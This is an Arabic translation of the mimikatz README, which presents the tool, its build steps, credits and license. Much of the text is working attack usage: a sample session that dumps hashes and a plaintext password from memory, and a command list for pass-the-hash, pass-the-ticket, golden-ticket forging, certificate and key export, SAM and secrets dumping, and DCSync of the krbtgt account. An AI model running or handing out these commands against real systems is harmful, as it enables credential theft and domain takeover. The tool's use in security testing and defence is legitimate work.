
أداة صغيرة للعب مع أمان Windows
mimikatz هي أداة قمت بإنشائها لتعلم لغة C ولإجراء بعض التجارب على أمان Windows.
أصبحت الآن معروفة جيدًا لاستخراج كلمات المرور النصية العادية، والتجزئات (hashes)، ورموز PIN، وتذاكر Kerberos من الذاكرة. يمكن لـ mimikatz أيضًا تنفيذ pass-the-hash، أو pass-the-ticket، أو بناء تذاكر ذهبية (Golden tickets).
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
لكن هذا ليس كل شيء! Crypto، Terminal Server، Events، ... الكثير من المعلومات في GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki أو على https://blog.gentilkiwi.com (بالفرنسية، نعم).
إذا كنت لا ترغب في بنائه، فإن الملفات الثنائية متاحة على https://github.com/gentilkiwi/mimikatz/releases
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz يأتي على شكل حل Visual Studio وبرنامج تشغيل WinDDK (اختياري للعمليات الرئيسية)، لذا فإن المتطلبات الأساسية هي:
mimikatz و mimilib : Visual Studio 2010 أو 2012 أو 2013 لسطح المكتب (إصدار 2013 Express لسطح المكتب مجاني ويدعم x86 و x64 - http://www.microsoft.com/download/details.aspx?id=44914)برنامج تشغيل mimikatz، mimilove (ومنصة ddk2003) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800mimikatz يستخدم SVN للتحكم بالمصدر، ولكنه متاح الآن مع GIT أيضًا! يمكنك استخدام أي أدوات تريدها للمزامنة، حتى GIT المدمج في Visual Studio 2013 =)
Build / Build Solution (يمكنك تغيير البنية)mimikatz الآن مبني وجاهز للاستخدام! (Win32 / x64 وحتى ARM64 إذا كنت محظوظًا)
MSB3073 بخصوص _build_.cmd و mimidrv، وذلك لأنه لا يمكن بناء برنامج التشغيل بدون Windows Driver Kit 7.1 (WinDDK)، لكن mimikatz و mimilib يعملان بشكل جيد.مع منصة MSBuild الاختيارية هذه، يمكنك استخدام أدوات بناء WinDDK ووقت التشغيل الافتراضي msvcrt (ملفات ثنائية أصغر، بدون تبعيات)
لهذه المنصة الاختيارية، يجب توفر Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 و Visual Studio 2010، حتى لو كنت تخطط لاستخدام Visual Studio 2012 أو 2013 لاحقًا.
اتبع التعليمات:
مشروع mimikatz متاح على AppVeyor - https://ci.appveyor.com/project/gentilkiwi/mimikatz
حالته:
ترخيص CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
mimikatz يحتاج إلى القهوة لتطويره:
Benjamin DELPY gentilkiwi، يمكنك الاتصال بي على Twitter ( @gentilkiwi ) أو عبر البريد الإلكتروني ( benjamin [at] gentilkiwi.com )
lsadump بالاشتراك مع Vincent LE TOUX، يمكنك الاتصال به عبر البريد الإلكتروني ( vincent.letoux [at] gmail.com ) أو زيارة موقعه على الويب ( http://www.mysmartlogon.com )هذا تطوير شخصي، يرجى احترام فلسفته وعدم استخدامه في الأمور السيئة!